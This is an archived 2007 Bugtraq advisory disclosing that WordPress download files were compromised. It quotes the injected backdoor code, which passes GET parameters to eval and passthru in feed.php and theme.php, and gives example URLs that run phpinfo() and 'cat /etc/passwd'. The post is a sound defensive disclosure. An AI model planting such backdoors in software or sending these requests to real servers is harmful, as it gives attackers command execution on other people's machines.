lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070303080345.6775.qmail@securityfocus.com>
Date: 3 Mar 2007 08:03:45 -0000
From: ifsecure@...il.com
To: bugtraq@...urityfocus.com
Subject: WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php. 
The following code has been added:


in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
       eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
       passthru($mcds);
}

...

if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }


this would enable remote command execution on machines running compromised versions, for example

http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.


Discovered and reported by Ivan Fratric
http://ifsec.blogspot.com


Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ